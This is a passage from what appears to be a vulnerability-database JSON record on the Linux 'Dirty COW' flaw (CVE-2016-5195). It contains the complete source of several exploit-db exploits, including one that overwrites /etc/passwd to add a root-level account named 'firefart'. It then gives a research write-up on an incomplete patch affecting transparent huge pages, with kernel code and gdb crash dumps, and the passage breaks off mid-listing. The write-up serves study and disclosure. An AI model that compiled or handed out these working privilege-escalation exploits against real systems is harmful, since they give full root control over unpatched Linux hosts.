cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n\r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n\r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n\r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n\r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40847/"}, {"lastseen": "2016-11-28T21:23:40", "bulletinFamily": "exploit", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation. CVE-2016-5195. Local exploit for Linux platform", "modified": "2016-11-28T00:00:00", "published": "2016-11-28T00:00:00", "id": "EDB-ID:40839", "href": "https://www.exploit-db.com/exploits/40839/", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation", "sourceData": "//\r\n// This exploit uses the pokemon exploit as a base and automatically\r\n// generates a new passwd line. The original /etc/passwd is then\r\n// backed up to /tmp/passwd.bak and overwritten with the new line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// Original exploit:\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// To use this exploit modify the user values according to your needs\r\n//\r\n// Compile with\r\n//\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// and just run the newly create binary with ./dirty\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n\r\n\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n\r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n\r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n\r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n\r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n\r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n\r\nvoid *madviseThread(void *arg) {\r\n int i, c = 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n\r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n\r\n char ch;\r\n FILE *source, *target;\r\n\r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n\r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n\r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n\r\n fclose(source);\r\n fclose(target);\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n\r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n\r\n char *plaintext_pw = getpass(\"Please enter new password: \");\r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n\r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n\r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40839/"}, {"lastseen": "2016-11-28T21:23:36", "bulletinFamily": "exploit", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access). CVE-2016-5195. Local exploit for Linux platform", "modified": "2016-10-26T00:00:00", "published": "2016-10-26T00:00:00", "id": "EDB-ID:40838", "href": "https://www.exploit-db.com/exploits/40838/", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)", "sourceData": "// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball\r\n#include <fcntl.h> //// pikachu\r\n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball\r\n#include <string.h> //// pokeball\r\n#include <stdio.h> //// (___)\r\n#include <stdint.h> //// (o o)_____/\r\n#include <sys/mman.h> //// @@ ` \\ \r\n#include <sys/types.h> //// \\ ____, /miltank\r\n#include <sys/stat.h> //// // //\r\n#include <sys/wait.h> //// ^^ ^^\r\n#include <sys/ptrace.h> //// mmap bc757000\r\n#include <unistd.h> //// madvise 0\r\n////////////////////////////////////////////// ptrace 0\r\n////////////////////////////////////////////// miltank\r\n//////////////////////////////////////////////\r\nint f ;// file descriptor\r\nvoid *map ;// memory map\r\npid_t pid ;// process id\r\npthread_t pth ;// thread\r\nstruct stat st ;// file info\r\n//////////////////////////////////////////////\r\nvoid *madviseThread(void *arg) {// madvise thread\r\n int i,c=0 ;// counters\r\n for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8\r\n c+=madvise(map,100,MADV_DONTNEED) ;// race condition\r\n printf(\"madvise %d\\n\\n\",c) ;// sum of errors\r\n }// /madvise thread\r\n//////////////////////////////////////////////\r\nint main(int argc,char *argv[]) {// entrypoint\r\n if(argc<3)return 1 ;// ./d file contents\r\n printf(\"%s \\n\\\r\n (___) \\n\\\r\n (o o)_____/ \\n\\\r\n @@ ` \\\\ \\n\\\r\n \\\\ ____, /%s \\n\\\r\n // // \\n\\\r\n ^^ ^^ \\n\\\r\n\", argv[1], argv[2]) ;// dirty cow\r\n f=open(argv[1],O_RDONLY) ;// open read only file\r\n fstat(f,&st) ;// stat the fd\r\n map=mmap(NULL ,// mmap the file\r\n st.st_size+sizeof(long) ,// size is filesize plus padding\r\n PROT_READ ,// read-only\r\n MAP_PRIVATE ,// private mapping for cow\r\n f ,// file descriptor\r\n 0) ;// zero\r\n printf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code\r\n pid=fork() ;// fork process\r\n if(pid) {// if parent\r\n waitpid(pid,NULL,0) ;// wait for child\r\n int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)\r\n for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l\r\n for(o=0;o<l;o++)//////////////////////// repeat for each byte\r\n for(u=0;u<10000;u++)////////////////// try 10K times each time\r\n c+=ptrace(PTRACE_POKETEXT ,// inject into memory\r\n pid ,// process id\r\n map+o ,// address\r\n *((long*)(argv[2]+o))) ;// value\r\n printf(\"ptrace %d\\n\\n\",c) ;// sum of error code\r\n }// otherwise\r\n else {// child\r\n pthread_create(&pth ,// create new thread\r\n NULL ,// null\r\n madviseThread ,// run madviseThred\r\n NULL) ;// null\r\n ptrace(PTRACE_TRACEME) ;// stat ptrace on child\r\n kill(getpid(),SIGSTOP) ;// signal parent\r\n pthread_join(pth,NULL) ;// wait for thread\r\n }// / child\r\n return 0 ;// return\r\n }// / entrypoint\r\n//////////////////////////////////////////////", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40838/"}], "seebug": [{"lastseen": "2017-12-25T18:30:18", "bulletinFamily": "exploit", "description": "The \u201cDirty COW\u201d vulnerability ([CVE-2016\u20135195](https://medium.com/r/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2016-5195)) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast\u200a\u2014\u200amillions of users could be compromised easily and reliably, bypassing common exploit defenses.\r\n\r\nPlenty of information was published about the vulnerability, but its patch was not analyzed in detail.\r\n\r\nWe at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.\r\n\r\n### \"Dirty COW\" recap\r\nFirst, we need a full understanding of the original Dirty COW exploit. We\u2019ll assume basic understanding of the Linux memory manager. We won\u2019t recover the original gory details, as talented people have [already done](https://medium.com/r/?url=https%3A%2F%2Fchao-tic.github.io%2Fblog%2F2017%2F05%2F24%2Fdirty-cow) so.\r\n\r\nThe original vulnerability was in the `get_user_pages` function. This function is used to get the physical pages behind virtual addresses in user processes. The caller has to specify what kind of actions he intends to perform on these pages (touch, write, lock, etc\u2026), so the memory manager could prepare the pages accordingly. Specifically, when planning to perform a write action on a page inside a private mapping, the page may need to go through a COW (Copy-On-Write) cycle\u200a\u2014\u200athe original, \u201cread-only\u201d page is copied to a new page which is writable. The original page could be \u201cprivileged\u201d\u200a\u2014\u200ait could be mapped in other processes as well, and might even be written back to the disk after it\u2019s modified.\r\n\r\nLet\u2019s now take a look at the relevant code in `__get_user_pages`:\r\n```\r\n\r\nstatic long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,\r\n unsigned long start, unsigned long nr_pages,\r\n unsigned int gup_flags, struct page **pages,\r\n struct vm_area_struct **vmas, int *nonblocking)\r\n{\r\n // ...\r\n do {\r\n struct page *page;\r\n unsigned int foll_flags = gup_flags;\r\n // ...\r\n vma = find_extend_vma(mm, start);\r\n // ... \r\n \r\nretry:\r\n // ...\r\n cond_resched();\r\n page = follow_page_mask(vma, start, foll_flags, &page_mask);\r\n if (!page) {\r\n int ret;\r\n ret = faultin_page(tsk, vma, start, &foll_flags,\r\n nonblocking);\r\n switch (ret) {\r\n case 0:\r\n goto retry;\r\n case -EFAULT:\r\n case -ENOMEM:\r\n case -EHWPOISON:\r\n return i ? i : ret;\r\n case -EBUSY:\r\n return i;\r\n case -ENOENT:\r\n goto next_page;\r\n }\r\n BUG();\r\n }\r\n // ...\r\n \r\nnext_page:\r\n // ...\r\n nr_pages -= page_increm;\r\n } while (nr_pages);\r\n return i;\r\n}\r\n```\r\n\r\nThe `while` loop\u2019s goal is to fetch each page in the requested page range. Each page has to be faulted in until our requirements are satisfied\u200a\u2014\u200athat\u2019s what the `retry` label is used for.\r\n\r\n`follow_page_mask`\u2019s role is to scan the page tables to get the physical page for the given address (while taking into account the PTE permissions), or fail in case the request can\u2019t be satisfied. During `follow_page_mask`\u2019s operation the PTE\u2019s spinlock is acquired\u2014 this guarantees the physical page won\u2019t be released before we grab a reference.\r\n\r\n`faultin_page` requests the memory manager to handle the fault in the given address with the specified permissions (also under the PTE\u2019s spinlock). Note that after a successful call to `faultin_page` the lock is released\u200a\u2014\u200ait\u2019s not guaranteed that `follow_page_mask` will succeed in the next retry; another piece of code might have messed with our page.\r\n\r\nThe original vulnerable code resided at the end of faultin_page:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags &= ~FOLL_WRITE;\r\n```\r\n\r\nThe reason for removing the `FOLL_WRITE` flag is to take into account the case the `FOLL_FORCE` flag is applied on a read-only VMA (when the `VM_MAYWRITE` flag is set in the VMA). In that case, the `pte_maybe_mkwrite` function won\u2019t set the write bit, however the faulted-in page is indeed ready for writing.\r\n\r\nIf the page went through a COW cycle (marked by the `VM_FAULT_WRITE` flag) while performing faultin_page and the VMA is not writable, the `FOLL_WRITE flag` is removed from the next attempt to access the page\u200a\u2014\u200aonly read permissions will be requested.\r\n\r\nIf the first `follow_page_mask` fails because the page was read-only or not present, we\u2019ll try to fault it in. Now let\u2019s imagine that during that time, until the next attempt to get the page, we\u2019ll get rid of the COW version (e.g. by using `madvise(MADV_DONTNEED)`).\r\n\r\nThe next call to `faultin_page` will be made without the `FOLL_WRITE` flag, so we\u2019ll get the read-only version of the page from the page cache. Now, the next call to `follow_page_mask` will also happen without the `FOLL_WRITE` flag, so it will return the privileged read-only page\u200a\u2014\u200aas opposed to the caller\u2019s original request for a writable version of the page.\r\n\r\nBasically, the aforementioned flow is the Dirty COW vulnerability\u200a\u2014\u200ait allows us to write to the read-only privileged version of a page. The following fix was introduced in `faultin_page`:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags |= FOLL_COW; // Instead of *flags &= ~FOLL_WRITE;\r\n```\r\n\r\n\r\nAnd a new function, which is called by `follow_page_mask`, was added:\r\n```\r\n/*\r\n * FOLL_FORCE can write to even unwritable pte's, but only\r\n * after we've gone through a COW cycle and they are dirty.\r\n */\r\nstatic inline bool can_follow_write_pte(pte_t pte, unsigned int flags)\r\n{\r\n\treturn pte_write(pte) ||\r\n\t\t((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));\r\n}\r\n```\r\n\r\n\r\n\r\nInstead of reducing the requested permissions, `get_user_pages` now remembers the fact the we went through a COW cycle. On the next iteration, we would be able to get a read-only page for a write operation only if the `FOLL_FORCE` and `FOLL_COW` flags are specified, and that the PTE is marked as dirty.\r\n\r\nThis patch assumes that the read-only privileged copy of a page will never have a PTE pointing to it with the dirty bit on\u200a\u2014\u200aa reasonable assumption\u2026 or is it?\r\n\r\n### Transparent Huge Pages (THP)\r\nNormally, Linux usually uses a 4096-bytes long pages. In order to enable the system to manage large amounts of memory, we can either increase the number of page table entries, or use larger pages. We focus on the second method, which is implemented in Linux by using [huge pages](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Florenzo-stoakes%2Flinux-vm-notes%2Fblob%2Fmaster%2Fsections%2Ftrans-huge-pages.md).\r\n\r\nA huge page is a 2MB long page. One of the ways to utilize this feature is through the Transparent Huge Pages mechanism. While there are other ways to get huge pages, they are outside of our scope.\r\n\r\nThe kernel will attempt to satisfy relevant memory allocations using huge pages. THP are swappable and \u201cbreakable\u201d (i.e. can be split into normal 4096-bytes pages), and can be used in anonymous, shmem and tmpfs mappings (the latter two are true only in newer kernel versions).\r\n\r\nUsually (depending on the compilation flags and the machine configuration) the default THP support is for anonymous mapping only. Shmem and tmpfs support can be turned on manually, and in general THP support can be turned on and off while the system is running by writing to some kernel\u2019s special files.\r\n\r\nAn important optimization opportunity is to coalesce normal pages into huge pages. A special daemon called khugepaged scans constantly for possible candidate pages that could be merged into huge pages. Obviously, to be a candidate, a VMA must cover a whole, aligned 2MB memory range.\r\n\r\nTHP is implemented by turning on the `_PAGE_PSE` bit of the PMD (Page Medium Directory, one level above the PTE level). The PMD thus points to a 2MB physical page, instead of a directory of PTEs. Each time the page tables are scanned, the PMDs must be checked with the `pmd_trans_huge` function, so we can decide whether the PMD points to a pfn or a directory of PTEs. On some architectures, huge PUDs (Page Upper Directory) exist as well, resulting in 1GB pages.\r\n\r\nTHP is supported since kernel 2.6.38. On most Android devices the THP subsystem is not enabled.\r\n\r\n### The bug\r\nDelving into the Dirty COW patch code that deals with THP, we can see that the same logic of `can_follow_write_pte` was applied to huge PMDs. A matching function called `can_follow_write_pm`d was added:\r\n```\r\nstatic inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)\r\n{\r\n return pmd_write(pmd) ||\r\n ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));\r\n}\r\n```\r\n\r\nHowever, in the huge PMD case, a page can be marked dirty without going through a COW cycle, using the `touch_pmd` function:\r\n```\r\nstatic void touch_pmd(struct vm_area_struct *vma, unsigned long addr,\r\n pmd_t *pmd)\r\n{\r\n pmd_t _pmd;\r\n\r\n /*\r\n * We should set the dirty bit only for FOLL_WRITE but for now\r\n * the dirty bit in the pmd is meaningless. And if the dirty\r\n * bit will become meaningful and we'll only set it with\r\n * FOLL_WRITE, an atomic set_bit will be required on the pmd to\r\n * set the young bit, instead of the current set_pmd_at.\r\n */\r\n _pmd = pmd_mkyoung(pmd_mkdirty(*pmd));\r\n if (pmdp_set_access_flags(vma, addr & HPAGE_PMD_MASK,\r\n pmd, _pmd, 1))\r\n update_mmu_cache_pmd(vma, addr, pmd);\r\n}\r\n```\r\n\r\n\r\n\r\nThis function is reached by `follow_page_mask`, which will be called each time `get_user_pages` tries to get a huge page. Obviously, the comment is incorrect and nowadays the dirty bit is NOT meaningless. In particular\u200a\u2014\u200awhen using `get_user_pages` to read a huge page, that page will be marked dirty without going through a COW cycle, and `can_follow_write_pmd`\u2019s logic is now broken.\r\n\r\nAt this point, exploiting the bug is straightforward\u200a\u2014\u200awe can use a similar pattern of the original Dirty COW race. This time, after we get rid of the copied version of the page, we have to fault the original page twice\u200a\u2014\u200afirst to make it present, and then to turn on the dirty bit.\r\n\r\nNow comes the inevitable question\u200a\u2014\u200ahow bad is this?\r\n\r\n### Bug implications\r\nIn order to exploit the bug, we have to choose an interesting read-only huge page as a target for the writing. The only constraint is that we need to be able to fetch it after it\u2019s discarded with `madvise(MADV_DONTNEED)`.\r\nAnonymous huge pages that were inherited from a parent process after a `fork` are a valuable target, however once they are discarded they are lost for good\u200a\u2014\u200awe can\u2019t fetch them again.\r\n\r\nWe found two interesting targets that should not be written into:\r\n* The huge zero page\r\n* Sealed (read-only) huge pages\r\n\r\n### The zero page\r\nWhen issuing a read fault on an anonymous mapping before it was ever written, we get a special physical page called the zero page. This optimization prevents the system from having to allocate multiple zeroed out pages in the system, which might never be written to. Thus, the exact same zero page is mapped in many different processes, which have different security levels.\r\n\r\nThe same principle applies to huge pages as well\u200a\u2014\u200athere\u2019s no need to create another huge page if no write fault has occurred yet\u200a\u2014\u200aa special page called the huge zero page will be mapped, instead. Note that this feature can be turned off as well.\r\n\r\n### THP, shmem and sealed files\r\nshmem and [tmpfs](https://medium.com/r/?url=https%3A%2F%2Fwww.kernel.org%2Fdoc%2FDocumentation%2Ffilesystems%2Ftmpfs.txt) files can be mapped using THP as well. shmem files can be created using the [memfd_create](https://medium.com/r/?url=http%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman2%2Fmemfd_create.2.html) syscall, or by mmaping anonymous shared mappings. tmpfs files can be created using the mount point of the tmpfs (usually `/dev/shm`). Both can be mapped with huge pages, depending on the system configuration.\r\n\r\nshmem files can be sealed\u200a\u2014\u200asealing a file restricts the set of operations allowed on the file in question. This mechanism allows processes that don\u2019t trust each other to communicate via shared memory without having to take extra measures to deal with unexpected manipulations of the shared memory region (see `man memfd_create()` for more info). Three types of seals exist -\r\n* `F_SEAL_SHRINK`: file size cannot be reduced\r\n* `F_SEAL_GROW`: file size cannot be increased\r\n* `F_SEAL_WRITE`: file content cannot be modified\r\n\r\nThese seals can be added to the shmem file using the `fcntl` syscall.\r\n\r\n### POC\r\nOur POC demonstrates overwriting the huge zero page. Overwriting shmem should be equally possible and would lead to an alternative exploit path.\r\n\r\nNote that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) THP. Using this primitive, we successfully crash several processes. A likely consequence of overwriting the huge zero page is having improper initial values inside large BSS sections. A common vulnerable pattern would be using the zero value as an indicator that a global variable hasn\u2019t been initialized yet.\r\n\r\nThe following crash example demonstrates that pattern. In this example, the JS Helper thread of Firefox makes a `NULL`-deref, probably because the boolean pointed by `%rdx` erroneously says the object was initialized:\r\n```\r\nThread 10 \"JS Helper\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffe2aee700 (LWP 14775)]\r\n0x00007ffff13233d3 in ?? () from /opt/firefox/libxul.so\r\n(gdb) i r\r\nrax 0x7fffba7ef080 140736322269312\r\nrbx 0x0 0\r\nrcx 0x22 34\r\nrdx 0x7fffba7ef080 140736322269312\r\nrsi 0x400000000 17179869184\r\nrdi 0x7fffe2aede10 140736996498960\r\nrbp 0x0 0x0\r\nrsp 0x7fffe2aede10 0x7fffe2aede10\r\nr8 0x20000 131072\r\nr9 0x7fffba900000 140736323387392\r\nr10 0x7fffba700000 140736321290240\r\nr11 0x7fffe2aede50 140736996499024\r\nr12 0x1 1\r\nr13 0x7fffba7ef090 140736322269328\r\nr14 0x2 2\r\nr15 0x7fffe2aee700 140736996501248\r\nrip 0x7ffff13233d3 0x7ffff13233d3\r\neflags 0x10246 [ PF ZF IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/10i $pc-0x10\r\n 0x7ffff13233c3: mov %rax,0x10(%rsp)\r\n 0x7ffff13233c8: mov 0x8(%rdx),%rbx\r\n 0x7ffff13233cc: mov %rbx,%rbp\r\n 0x7ffff13233cf: and $0xfffffffffffffffe,%rbp\r\n=> 0x7ffff13233d3: mov 0x0(%rbp),%eax\r\n 0x7ffff13233d6: and $0x28,%eax\r\n 0x7ffff13233d9: cmp $0x28,%eax\r\n 0x7ffff13233dc: je 0x7ffff1323440\r\n 0x7ffff13233de: mov %rbx,%r13\r\n 0x7ffff13233e1: and $0xfffffffffff00000,%r13\r\n(gdb) x/10w $rdx\r\n0x7fffba7ef080: 0x41414141 0x00000000 0x00000000 0x00000000\r\n0x7fffba7ef090: 0xeef93bba 0x00000000 0xda95dd80 0x00007fff\r\n0x7fffba7ef0a0: 0x778513f1 0x00000000\r\n```\r\n\r\nThis is another crash example\u200a\u2014\u200agdb crashes while loading the symbols for a Firefox debugging session:\r\n```\r\n(gdb) r\r\nStarting program: /opt/firefox/firefox \r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n(gdb) i s\r\n#0 0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n#1 0x0000555555955203 in htab_find_slot_with_hash (htab=0x555557008e60, element=element@entry=0x7fffffffdb00, hash=4181413748, insert=insert@entry=INSERT) at ./hashtab.c:659\r\n#2 0x0000555555955386 in htab_find_slot (htab=<optimized out>, element=element@entry=0x7fffffffdb00, insert=insert@entry=INSERT) at ./hashtab.c:703\r\n#3 0x00005555558273e5 in symbol_set_names (gsymbol=gsymbol@entry=0x5555595b3778, linkage_name=linkage_name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", len=len@entry=48, \r\n copy_name=copy_name@entry=0, objfile=<optimized out>) at symtab.c:818\r\n#4 0x00005555557d186f in minimal_symbol_reader::record_full (this=0x7fffffffdce0, this@entry=0x1768bd6, name=<optimized out>, \r\n name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=48, address=24546262, ms_type=ms_type@entry=mst_file_text, \r\n section=13) at minsyms.c:1010\r\n#5 0x00005555556959ec in record_minimal_symbol (reader=..., name=name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=false, \r\n address=<optimized out>, address@entry=24546262, ms_type=ms_type@entry=mst_file_text, bfd_section=<optimized out>, objfile=0x555557077860) at elfread.c:209\r\n#6 0x0000555555696ac6 in elf_symtab_read (reader=..., objfile=objfile@entry=0x555557077860, type=type@entry=0, number_of_symbols=number_of_symbols@entry=365691, \r\n symbol_table=symbol_table@entry=0x7ffff6a6d020, copy_names=copy_names@entry=false) at elfread.c:462\r\n#7 0x00005555556970c4 in elf_read_minimal_symbols (symfile_flags=<optimized out>, ei=0x7fffffffdcd0, objfile=0x555557077860) at elfread.c:1084\r\n#8 elf_symfile_read (objfile=0x555557077860, symfile_flags=...) at elfread.c:1194\r\n#9 0x000055555581f559 in read_symbols (objfile=objfile@entry=0x555557077860, add_flags=...) at symfile.c:861\r\n#10 0x000055555581f00b in syms_from_objfile_1 (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1062\r\n#11 syms_from_objfile (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1078\r\n#12 symbol_file_add_with_addrs (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., parent=parent@entry=0x0)\r\n at symfile.c:1177\r\n#13 0x000055555581f63d in symbol_file_add_from_bfd (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., \r\n parent=parent@entry=0x0) at symfile.c:1268\r\n#14 0x000055555580b256 in solib_read_symbols (so=so@entry=0x55555738bfc0, flags=...) at solib.c:712\r\n#15 0x000055555580be9b in solib_add (pattern=pattern@entry=0x0, from_tty=from_tty@entry=0, readsyms=1) at solib.c:1016\r\n#16 0x000055555580c678 in handle_solib_event () at solib.c:1301\r\n#17 0x00005555556f9db4 in bpstat_stop_status (aspace=0x555555ff5670, bp_addr=bp_addr@entry=140737351961185, ptid=..., ws=ws@entry=0x7fffffffe1d0) at breakpoint.c:5712\r\n#18 0x00005555557ad1ef in handle_signal_stop (ecs=0x7fffffffe1b0) at infrun.c:5963\r\n#19 0x00005555557aec8a in handle_inferior_event_1 (ecs=0x7fffffffe1b0) at infrun.c:5392\r\n#20 handle_inferior_event (ecs=ecs@entry=0x7fffffffe1b0) at infrun.c:5427\r\n#21 0x00005555557afd57 in fetch_inferior_event (client_data=<optimized out>) at infrun.c:3932\r\n#22 0x000055555576ade5 in gdb_wait_for_event (block=block@entry=0) at event-loop.c:859\r\n#23 0x000055555576aef7 in gdb_do_one_event () at event-loop.c:322\r\n#24 0x000055555576b095 in gdb_do_one_event () at ./common/common-exceptions.h:221\r\n#25 start_event_loop () at event-loop.c:371\r\n#26 0x00005555557c3938 in captured_command_loop (data=data@entry=0x0) at main.c:325\r\n#27 0x000055555576d243 in catch_errors (func=func@entry=0x5555557c3910 <captured_command_loop(void*)>, func_args=func_args@entry=0x0, errstring=errstring@entry=0x555555a035da \"\", \r\n mask=mask@entry=RETURN_MASK_ALL) at exceptions.c:236\r\n#28 0x00005555557c49ae in captured_main (data=<optimized out>) at main.c:1150\r\n#29 gdb_main (args=<optimized out>) at main.c:1160\r\n#30 0x00005555555ed628 in main (argc=<optimized out>, argv=<optimized out>) at gdb.c:32\r\n(gdb) list\r\n692 const struct demangled_name_entry *da\r\n693 = (const struct demangled_name_entry *) a;\r\n694 const struct demangled_name_entry *db\r\n695 = (const struct demangled_name_entry *) b;\r\n696 \r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n698 }\r\n699 \r\n700 /* Create the hash table used for demangled names. Each hash entry is\r\n701 a pair of 